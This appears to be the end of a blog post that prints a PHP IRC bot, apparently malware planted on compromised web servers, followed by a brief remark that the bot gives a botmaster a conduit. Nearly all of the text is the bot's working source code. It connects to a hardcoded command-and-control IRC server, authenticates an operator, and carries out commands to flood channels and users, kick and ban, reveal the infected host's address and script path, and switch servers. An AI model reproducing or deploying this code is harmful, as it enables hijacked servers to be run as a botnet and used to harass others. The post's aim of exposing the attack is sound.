”pijakence”,
”hai-blaeh”,
”power-you”,
”djstone”,
”djkid”,
”djthekid”,
”djmaster”,
”eftimie”,
”djcorason”,
”djalex”,
”djconstantin”,
”djbitch”,
”djk1d”,
”djtarget”,
”masterjungel”,
”daradaam”,
”uhmenze”,
”glicjex”,
”fortex”,
”hepafoneav”,
”m00rd3r”,
”tzacapaca”,
”nijeaz”,
”clijekcmez”,
”okkmmenc”,
”psyBNCz”,
”shellZ0″,
”kinderuL”,
”XeqtR”,
”metrolink”,
”ana”,
”anna”,
”squre”,
”xzvf0″,
”k1d-”,
”norman”,
”zquRs”,
”howhigh”,
”howhigt2″,
”blessus”,
”am3rica”,
”amer1ca”,
”spion”,
”spypower”,
”nextfan”,
”upl0ad”,
”s3arch”,
”searchX”,
”b0rak”,
”w00ps”,
”s0x”,
”nefertiti”,
”woops”,
”higlas”,
”cronx”,
”sown”,
”zappura”,
”heavenX”,
”muhahah1″,
”biker4zs1″,
”ckkemc1″,
”clujeane1″,
”hepahofn1″,
”hepafon1″,
”blackspace1″,
”aabbcc1″,
”ni1krc1″,
”perosume1″,
”perugis1″,
”cliskeacz1″,
”hennmx0c1″,
”gbusf411″,
”bv9mvu31″,
”nik3rcs1″,
”ghruwec1″,
”slickez1″,
”burgez1″,
”h4mburger1″,
”dijenmcie1″,
”pijakence1″,
”hai-blaeh1″,
”power-you1″,
”djstone1″,
”djkid1″,
”djthekid1″,
”djmaster1″,
”eftimie1″,
”djcorason1″,
”djalex1″,
”djconstantin1″,
”djbitch1″,
”djk1d1″,
”djtarget1″,
”masterjungel1″,
”daradaam1″,
”uhmenze1″,
”glicjex1″,
”fortex1″,
”hepafoneav1″,
”m00rd3r1″,
”tzacapaca1″,
”nijeaz1″,
”clijekcmez1″,
”okkmmenc1″,
”psyBNCz1″,
”shellZX”,
);
$usr1=array(
“zider”,
);
$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = “_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚»_8!_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚« 4H4Kim _8CÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚®ÃfĮâ€TMÃf†â€™Ãfƒâ€šÃf‚«wS _4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚»_8!_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚«__”;
$identify = ”;
$Admin = ‘zaNga’;
$BOT_PASSWORD = ‘123′;
$channels = ‘netcat’;$remotehst2= array(”irc.yogyakarta.cn”);
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = ‘6667′;$raway = “on”;
$realname = $nick;
$counterfp = 0;
$channels = str_replace(”CNL”,”",$channels);
print “<body bgcolor=#000000 text=#C0C0C0>”;
print “<b>== Connecting to $remotehost…</b>”;
$log = “off”;
$saway = “1″;
if (!$stime) { $stime = time(); }
if (!$port) { $port = “6666″; }
$Admin = strtolower($Admin);
$auth = array($Admin => array(”name” => $Admin, “pass” => $BOT_PASSWORD, “auth” => 1,”status” => “Admin”));
$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = ‘localhost’;
$dayload = date(”H:i:s d/m/Y”);
ini_set(’user_agent’,'MSIE 5\.5;’);
set_time_limit(0);
define (’CRL’, “\r\n”);
$channels = strtolower($channels).” “;
$channel = explode(” “, $channels);
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp+1;
working($nick);
}
else {
print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";
$keluar = 1;
exit;
}
}
print “<br><b>== Suceeded connection</b>”;
$Header = ‘NICK ‘.$nick . CRL;
$Header .= ‘USER ‘.$username.’ ‘.$localhost.’ ‘.$remotehost.’ :’.$realname . CRL;
fputs($fp, $Header);
$response = ”;
while (!feof($fp)) {
$response .= fgets($fp, 1024);
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$dFrom = substr($data,1,$offsetA-1);
$offsetB = strpos($data, ' :');
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$offsetC = strpos($data, '!');
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify ‘.$nick.’ ‘.$identify. CRL);
if ($nickmode) { fputs($fp, ‘MODE ‘.$nick.’ :’.$nickmode . CRL); }
fputs($fp, ‘NOTICE ‘ . $Admin . ‘ :Halo bos besar!’ . CRL);
foreach ($channel as $v) {
fputs($fp, ‘JOIN ‘ .$v . CRL);
}
$pong1 = ‘1′;
}
elseif (substr($dCommand,0,3)==’465′) {
print “<br><b>== This bot have been autokilled.</b>”;
$akill = 2;
}
elseif (substr($dCommand,0,3)==’433′) {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, ‘NICK ‘.$nick . CRL);
}
elseif (substr($dCommand,0,3)==’432′) {
$nick = $nick.$username;
fputs($fp, ‘NICK ‘.$nick . CRL);
}
if (eregi(’.dal.net’,$dNick) && $akill==2) {
if (eregi(’AKILL ID:’,$data) || eregi(’Your hostmask is’,$data) || eregi(’Your IP is’,$data)) {
print “<br><b>”.strstr($data,’***’).” </b>”;
if (eregi(’Your IP is’,$data)) {
$keluar = 1;
exit;
}
}
}
$dcom = explode(” “, $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]==’KICK’ && $dcom[2]==$nick) {
fputs($fp, ‘JOIN ‘ .$dcom[1]. CRL);
}
elseif ($dcom[0]==’NICK’ || $dcom[0]==’QUIT’ || $dcom[0]==’PART’) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($dcom[0]==’NICK’) {
$com = explode(” “, $data);
$chnick = strtolower(str_replace(’:',”,$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,’NOTICE ‘.$chnick.’ :selamat istirahat bos! ‘ . CRL);
}
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,’NOTICE ‘.$dNick.’ :selamat istirahat bos! ‘ . CRL); }
}
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :pass your pass ‘ . CRL); }
}
}
elseif ($dcom[0]==’307′ && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]“]) {
if ($auth["$dcom[2]“]["pass"]) {
if ($auth["$dcom[2]“]["auth"]==1) {
$auth["$dcom[2]“]["auth"] = 2; $whois = “”;
fputs($fp,’NOTICE ‘ . $dcom[2] . ‘ :kamu masukan password as ‘.$auth["$dcom[2]“]["status"].’ of this bot! ‘ . CRL);
} else { fputs($fp,’NOTICE ‘ . $dcom[2] . ‘ :password oke bos aChOnGs seep emuach di titid! ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dcom[2] . ‘ :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dcom[2] . ‘ :Username Not Found! Change Your Nick then Auth Again ‘ . CRL); }
}
elseif ($dcom[0]==’NOTICE’) {
$com = explode(” “, $data);
if ($com[3]==’:KB’ && $com[4] && $com[5] && $com[6]) {
$msg = strreplace(’‘,”,$data);
$msg = strstr($msg,”:KB”);
$msg = strreplace(”:KB $com[4]“,”",$msg);
fputs($fp, ‘KICK ‘.$com[4].’ ‘.$com[5].’ :’.$msg . CRL);
fputs($fp, ‘MODE ‘.$com[4].’ +b *!*’.$com[6] . CRL);
}
}
elseif ($dcom[0]==’PRIVMSG’) {
$com = explode(” “, $data);
if ($com[3]==’:VERSION‘) {
fputs($fp,’NOTICE ‘.$dNick.’ :’.chr(1).’VERSION mIRC v6.16 Khaled Mardam-Bey’.chr(1) . CRL);
}
elseif ($auth["$dNick"]["status"] && $com[3]==’:auth’ && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,’NOTICE ‘ . $dNick . ‘ :kamu masukkan password as ‘.$auth["$dNick"]["status"].’ of this bot! ‘ . CRL);
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :passworde salah syu! Auth salah Shu! ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :password bener bos aChOnGs emang oke! ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Username Not Found! Change Your Nick then Auth Again ‘ . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==’:deauth’) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,’NOTICE ‘ . $dNick . ‘ :You`re LogOut! ‘ . CRL);
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :You`re Already LogOut! ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Username Not Found! Change Your Nick then Auth Again ‘ . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==’:pass’ && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,’NOTICE ‘ . $dNick . ‘ :Your Auth Pass set to ‘.$auth["$dNick"]["pass"].’, Type: auth <your pass> To Authorized Imediately! ‘ . CRL);
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Pass Already Set! Type: auth <your pass> To Get Authorized ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Username Not Found! Change Your Nick then Pass Again ‘ . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==’:chgpass’ && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,’NOTICE ‘ . $dNick . ‘ :Your New Auth Pass set to ‘.$auth["$dNick"]["pass"].’, Type: auth <your pass> To Authorized Imediately! ‘ . CRL);
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Please Auth First! Type: auth <your pass> To Authorized ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Username Not Found! Change Your Nick then Pass Again ‘ . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==’:adduser’ && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]==”Admin”) {
if ($com[5]==”master” || $com[5]==”user”) {
$auth["$com[4]“]["name"] = $com[4];
$auth["$com[4]“]["status"] = $com[5];
fputs($fp,’NOTICE ‘ . $dNick . ‘ :AddUser :’.$com[4].’ As My ‘.$com[5] . CRL);
fputs($fp,’NOTICE ‘ . $com[4] . ‘ :You`re Now Known As My ‘.$com[5].’ Added By ‘.$dNick.’ Now Type: pass <your pass> To Set Your Pass ‘ . CRL);
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :salah Command! Type: adduser <nick> <master/user> ‘ . CRL); }
} elseif ($auth["$dNick"]["status"]==”master”) {
if (!$auth["$com[4]“]) {
if ($com[5]==”user”) {
$auth["$com[4]“]["name"] = $com[4];
$auth["$com[4]“]["status"] = $com[5];
fputs($fp,’NOTICE ‘ . $dNick . ‘ :AddUser :’.$com[4].’ As My ‘.$com[5] . CRL);
fputs($fp,’NOTICE ‘ . $com[4] . ‘ :You`re Now Known As My ‘.$com[5].’ Added By ‘.$dNick.’ Now Type: pass <your pass33] <Spyderur Pass ‘ . CRL);
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Wrong Command! Type: adduser <nick> user ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :User Already Exist! Aborting AddUser! ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Unknown Status! Your Status is ‘.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Please Auth First! Type: auth <your pass> To Authorized ‘ . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==’:deluser’ && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]==”Admin”) {
if ($auth["$com[4]“]["status"]==”master” || $auth["$com[4]“]["status"]==”user”) {
unset($auth["$com[4]“]);
fputs($fp,’NOTICE ‘ . $dNick . ‘ :DelUser :’.$com[4].’ From My UserList ‘ . CRL);
fputs($fp,’NOTICE ‘ . $com[4] . ‘ :Your Access As My User Has Been Deleted By ‘.$dNick . CRL);
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Wrong Command! Type: deluser <nick> ‘ . CRL); }
} elseif ($auth["$dNick"]["status"]==”master”) {
if ($auth["$com[4]“]["status"]==”user”) {
unset($auth["$com[4]“]);
fputs($fp,’NOTICE ‘ . $dNick . ‘ :DelUser :’.$com[4].’ From My UserList ‘ . CRL);
fputs($fp,’NOTICE ‘ . $com[4] . ‘ :Your Access As My User Has Been Deleted By ‘.$dNick . CRL);
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Wrong Command! Type: deluser <nick> ‘ . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Unknown Status! Your Status is ‘.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,’NOTICE ‘ . $dNick . ‘ :Please Auth First! Type: auth <your pass> To Authorized ‘ . CRL); }
}
elseif ($auth["$dNick"]["status"]) {
if (ereg(”:`”,$com[3]) || ereg(”:!”,$com[3])) {
$chan = strstr($dCommand,”#”);
$anick = str_replace(”PRIVMSG “,”",$dCommand);
if ($com[3]==’:!auth’) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,’NOTICE ‘.$dNick.’ :Jembutz..! You`re already Authorized!’ . CRL);
} else {
$whois = $dNick;
fputs($fp,’WHOIS ‘.$dNick . CRL);
}
} elseif ($com[3]==’:`auth’ && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,’PRIVMSG ‘.$chan.’ :’.$dNick.’ Hamba siap mencari janda Bos!’ . CRL);
} else { fputs($fp,’PRIVMSG ‘.$chan.’ :’.$dNick.’ Raimu bukan bosku cok!’ . CRL); }
} elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==’:`say’ && $com[4] && $chan) {
$msg = strstr($data,”:`say”);
$msg = str_replace(”:`say “,”",$msg);
fputs($fp,’PRIVMSG ‘.$chan.’ :’.$msg. CRL);
}
elseif ($com[3]==’:`act’ && $com[4] && $chan) {
$msg = strstr($data,”:`act”);
$msg = str_replace(”:`act “,”",$msg);
fputs($fp,’PRIVMSG ‘.$chan.’ :ACTION ‘.$msg.’‘. CRL);
}
elseif ($com[3]==’:`slap’ && $com[4] && $chan) {
fputs($fp,’PRIVMSG ‘.$chan.’ :ACTION slaps ‘.$com[4].’ Jembut Raimu wani karo bosku around a bit with a large trout‘. CRL);
}
elseif ($com[3]==’:`msg’ && $com[4] && $com[5]) {
$msg = strstr($data,”:`msg”);
$msg = str_replace(”:`msg $com[4] “,”",$msg);
fputs($fp,’PRIVMSG ‘.$com[4].’ :’.$msg. CRL);
}
elseif ($com[3]==’:`notice’ && $com[4] && $com[5]) {
$msg = strstr($data,”:`notice”);
$msg = str_replace(”:`notice $com[4] “,”",$msg);
fputs($fp,’NOTICE ‘.$com[4].’ :’.$msg. CRL);
}
elseif ($com[3]==’:`ctcp’ && $com[4] && $com[5]) {
$msg = strstr($data,”:`ctcp”);
$msg = str_replace(”:`ctcp $com[4] “,”",$msg);
fputs($fp,’PRIVMSG ‘.$com[4].’ :‘.$msg.’‘. CRL);
}
elseif ($com[3]==’:`ping’ && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,’PRIVMSG ‘.$chan.’ :’.$dNick.’, _PONG!_ ‘.$sml. CRL);
}
elseif ($com[3]==’:`pong’ && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,’PRIVMSG ‘.$chan.’ :’.$dNick.’, _PING!_ ‘.$sml. CRL);
}
elseif ($com[3]==’:`info’ && $auth["$dNick"]["status"]==”Admin”) {
$bhost = $SERVER['HTTPHOST'];
$bphp = $SERVER['PHPSELF'];
fputs($fp,’NOTICE ‘.$dNick.’ :Bot Host: ‘.$bhost.’, Bot PHP: ‘.$bphp. CRL);
}
elseif ($com[3]==’:`up’ && $chan) {
fputs($fp, ‘PRIVMSG chanserv@services.dal.net :op ‘.$chan.’ ‘.$nick . CRL);
}
elseif ($com[3]==’:`down’ && $chan) {
fputs($fp, ‘MODE ‘.$chan.’ +v-o ‘.$nick.’ ‘.$nick . CRL);
}
elseif ($com[3]==’:`tsunami’ && $com[4] && $auth["$dNick"]["status"]!=”user”) {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, ‘NICK ‘.$nicktsu . CRL);
if (substr($dCommand,0,3)==’433′) {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, ‘NICK ‘.$nicktsu . CRL);
}
$msg = strstr($data,”:`tsunami”);
$msg = str_replace(”:`tsunami $com[4]“,”",$msg);
if (ereg(”#”, $com[4])) {
fputs($fp, ‘JOIN ‘.$com[4] . CRL);
}
fputs($fp, ‘PRIVMSG ‘.$com[4].’ :‘.$msg.’__________________________________________________________________________________________________________________________________________________________________________________________________________________________________‘ . CRL);
fputs($fp, ‘NOTICE ‘.$com[4].’ :‘.$msg.’___________________________________________________________________________________________________________________________________________________________________________________________________________________________________‘ . CRL);
fputs($fp, ‘PRIVMSG ‘.$com[4].’ :TSUNAMI ‘.$msg.’____________________________________________________________________________________________________________________________________________________________________________________________________________________________________’ . CRL);
fputs($fp, ‘PRIVMSG ‘.$com[4].’ :‘.$msg.’__________________________________________________________________________________________________________________________________________________________________________________________________________________________________‘ . CRL);
fputs($fp, ‘NOTICE ‘.$com[4].’ :‘.$msg.’___________________________________________________________________________________________________________________________________________________________________________________________________________________________________‘ . CRL);
fputs($fp, ‘PRIVMSG ‘.$com[4].’ :FLOOD ‘.$msg.’____________________________________________________________________________________________________________________________________________________________________________________________________________________________________’ . CRL);
if (ereg(”“, $com[4])) {
fputs($fp, ‘PART ‘.$com[4].’ :Complete’ . CRL);
fputs($fp, ‘NICK ‘.$nick . CRL);
} else {
fputs($fp, ‘NICK ‘.$nick . CRL);
}
}
elseif ($com[3]==’:`cycle’ && $chan && $auth["$dNick"]["status"]!=”user”) {
$msg = strstr($data,”:`cycle”);
if (ereg(”“, $com[4])) {
$partchan = $com[4];
$msg = str_replace(”:`cycle $com[4]“,”",$msg);
} else {
$partchan = $chan;
$msg = str_replace(”:`cycle”,”",$msg);
}
if (strlen($msg)<3) {
$msg = ”;
}
fputs($fp, ‘PART ‘.$partchan.’ :‘.$msg . CRL);
fputs($fp, ‘JOIN ‘.$partchan . CRL);
}
elseif ($com[3]==’:`part’ && $auth["$dNick"]["status"]==”Admin”) {
$msg = strstr($data,”:`part”);
if (ereg(”#”, $com[4])) {
$partchan = $com[4];
$msg = strreplace(”:`part $com[4]“,”",$msg);
} else {
$partchan = $chan;
$msg = str_replace(”:`part”,”",$msg);
}
if (strlen($msg)<3) {
$msg = ”;
}
fputs($fp, ‘PART ‘.$partchan.’ :‘.$msg . CRL);
$remchan = strtolower($partchan);
if (inarray($remchan, $channel)) {
$channels = str_replace(”$remchan “,”",$channels);
unset($channel);
$channel = explode(” “, $channels);
}
foreach ($channel as $v) {
fputs($fp, ‘JOIN ‘.$v . CRL);
}
}
elseif ($com[3]==’:`join’ && $com[4] && $auth["$dNick"]["status"]==”Admin”) {
if (!ereg(”“,$com[4])) { $com[4]=”“.$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channel[]=$addchan;
$channels.=”$addchan “;
}
foreach ($channel as $v) {
sleep(rand(1,6));
fputs($fp, ‘JOIN ‘.$v . CRL);
}
}
elseif ($com[3]==’:`botnick’ && $com[4] && !$chan && $auth["$dNick"]["status"]==”Admin”) {
$nick = $com[4];
$identify = $com[5];
fputs($fp, ‘NICK ‘.$nick . CRL);
fputs($fp, ‘PRIVMSG nickserv@services.dal.net :identify ‘.$nick.’ ‘.$identify. CRL);
}
elseif ($com[3]==’:`k’ && $com[4] && $chan) {
$msg = strstr($data,”:`k”);
$msg = str_replace(”:`k $com[4]“,”",$msg);
fputs($fp, ‘KICK ‘.$chan.’ ‘.$com[4].’ :’.$msg . CRL);
}
elseif ($com[3]==’:`kb’ && $com[4] && $chan) {
$msg = strstr($data,”:`kb”);
$msg = str_replace(”:`kb $com[4]“,”",$msg);
fputs($fp, ‘KICK ‘.$chan.’ ‘.$com[4].’ :’.$msg . CRL);
fputs($fp, ‘MODE ‘.$chan.’ +b ‘.$com[4] . CRL);
}
elseif ($com[3]==’:`ganti’) {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, ‘NICK ‘.$nick . CRL);
if (substr($dCommand,0,3)==’433′) {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, ‘NICK ‘.$nick . CRL);
}
}
elseif ($com[3]==’:`op’ && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, ‘MODE ‘.$chan.’ +ooo ‘.$opnick.’ ‘.$com[5].’ ‘.$com[6] . CRL);
}
elseif ($com[3]==’:`deop’ && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, ‘MODE ‘.$chan.’ -o+v-oo ‘.$opnick.’ ‘.$opnick.’ ‘.$com[5].’ ‘.$com[6] . CRL);
}
elseif ($com[3]==’:`v’ && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, ‘MODE ‘.$chan.’ +vvv ‘.$vonick.’ ‘.$com[5].’ ‘.$com[6] . CRL);
}
elseif ($com[3]==’:`dv’ && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, ‘MODE ‘.$chan.’ -vvv ‘.$vonick.’ ‘.$com[5].’ ‘.$com[6] . CRL);
}
elseif ($com[3]==’:`awaymsg’ && $auth["$dNick"]["status"]==”Admin”) {
$msg = strstr($data,”:`awaymsg”);
$msg = str_replace(”:`awaymsg”,”",$msg);
if (strlen($msg)<3) {
$raway=”on”;
fputs($fp,’AWAY : ‘ . ‘AWAY’ . CRL);
} else {
$raway=”off”;
fputs($fp,’AWAY : ‘ . $msg . CRL);
}
}
elseif ($com[3]==’:`mode’ && $com[4] && $chan) {
fputs($fp, ‘MODE ‘.$chan.’ :’.$com[4].’ ‘.$com[5] . CRL);
}
elseif ($com[3]==’:`nickmode’ && $com[4]) {
$nickmode = $com[4];
fputs($fp, ‘MODE ‘.$nick.’ :’.$nickmode . CRL);
}
elseif ($com[3]==’:`chanlist’) {
fputs($fp, ‘NOTICE ‘.$dNick.’ :Channel List: ‘.$channels . CRL);
}
elseif ($com[3]==’:`userlist’) {
$userlist=”";
foreach ($auth as $user) {
if ($user["pass"]) { $pass=”-pass ok”; }
else { $pass=”-no pass”; }
$userlist .= $user["name"].’(’.$user["status"].$pass.’) ‘;
}
fputs($fp, ‘NOTICE ‘.$dNick.’ :User List: ‘.$userlist . CRL);
}
elseif ($com[3]==’:`quit’ && $auth["$dNick"]["status"]==”Admin”) {
$msg = strstr($data,”:`quit”);
$msg = str_replace(”:`quit”,”",$msg);
if (strlen($msg)>3) {
$msg = str_replace(” “,”“,$msg);
}
$quit1 = array(”ngantor”,”nguantuk”,”sama”,”brb”,”byeall”,”s33_you”,”excess_flood”,”pingtimeout”,”hehe”,”bye”,”mandi”,”makan”,”muuah”,”quit”,”conection_reset_bay_peer”,”banned”,”part”,”leaving”,”ada_deh”,”call_me”,”wew”,”toronto.hub.dal.net_brodway.dal.net”,”no_komen”,”restart”);
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
fputs($fp, ‘QUIT ‘ . $quitmsg . CRL);
$keluar = 1;
exit;
}
elseif ($com[3]==’:`vhost’ && $auth["$dNick"]["status"]==”Admin”) {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = ‘localhost’; }
$keluar = 0;
fputs($fp, ‘QUIT ‘ . CRL);
}
elseif ($com[3]==’:`jump’ && $auth["$dNick"]["status"]==”Admin”) {
if (!eregi(”.dal.net”,$com[4])) {
$remotehost = “irc.dal.net”;
} else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, ‘QUIT changging_server’ . CRL);
}
elseif ($com[3]==’:`ident’ && $auth["$dNick"]["status"]==”Admin”) {
if (!$com[4]) {
$username = $username;
} else { $username = $com[4]; }
$keluar = 0;
fputs($fp, ‘QUIT ganti_ident’ . CRL);
}
elseif ($com[3]==’:`fullname’ && $auth["$dNick"]["status"]==”Admin”) {
if (!$com[4]) {
$realname = “–”;
} else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, ‘QUIT ganti_fullname’ . CRL);
}
elseif ($com[3]==’:`topic’ && $com[4] && $chan) {
$msg = strstr($data,”:`topic”);
$msg = str_replace(”:`topic “,”",$msg);
fputs($fp, ‘TOPIC ‘.$chan.’ :’.$msg . CRL);
}
elseif ($com[3]==’:!help’ && !$chan) {
fputs($fp,’PRIVMSG ‘.$dNick.’ :Secret Help’ . CRL);
}
} else { fputs($fp,’NOTICE ‘.$dNick.’ :Please Auth First! Type: auth <your pass> To Authorized ‘. CRL); }
}
}
elseif (!$auth["$dNick"] && !eregi(”auth”,$iText)) {
if (eregi(”www.”,$iText) || eregi(”http:”,$iText) || eregi(”join “,$iText)) {
if (!ereg(”“,$dCommand)) {
if ($log==”on”) {
fputs($fp,’PRIVMSG ‘. $Admin .’ :4inviter: ‘ . $dFrom . ‘2:’ .$iText. CRL);
}
$inv = strstr($dFrom,’@');
foreach ($auth as $user) {
if ($user["status"]==”user”) {
fputs($fp, ‘NOTICE ‘.$user["name"].’ :KB ‘.$chan.’ ‘.$dNick.’ ‘.$inv.’‘ . CRL);
}
}
}
}
elseif (!ereg(”#”,$dCommand)) {
if ($log==”on”) {
fputs($fp,’PRIVMSG ‘.$Admin.’ :6′ . $dFrom . ‘12:’ .$iText. CRL);
}
}
}
}
}
elseif (substr($data,0,4) == ‘PING’) {
fputs($fp,’PONG ‘ . substr($data,5) . CRL);
$smile = $querym[rand(0,count($querym) - 1)];
$kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
fputs($fp,’PRIVMSG #whatz :’ . $kata1 . ‘ ‘ . $kata2 . $smile . CRL);
}
}
}
fclose ($fp);
} while ($keluar==0);
}
working($nick);
?>
Yes, that’s right Nancy, it’s an IRC bot coded in PHP! Quite nice. It appears to give a conduit to a bot master, probably used to upload and execute new scripts. Fortunately, most sites aren’t vulnerable to this relatively old attack. It is interesting, though, that the attacks are clearly aimed at certain types of software that are apparently perceived as vulnerable by the miscreant that is spreading this gunk.
Home
|
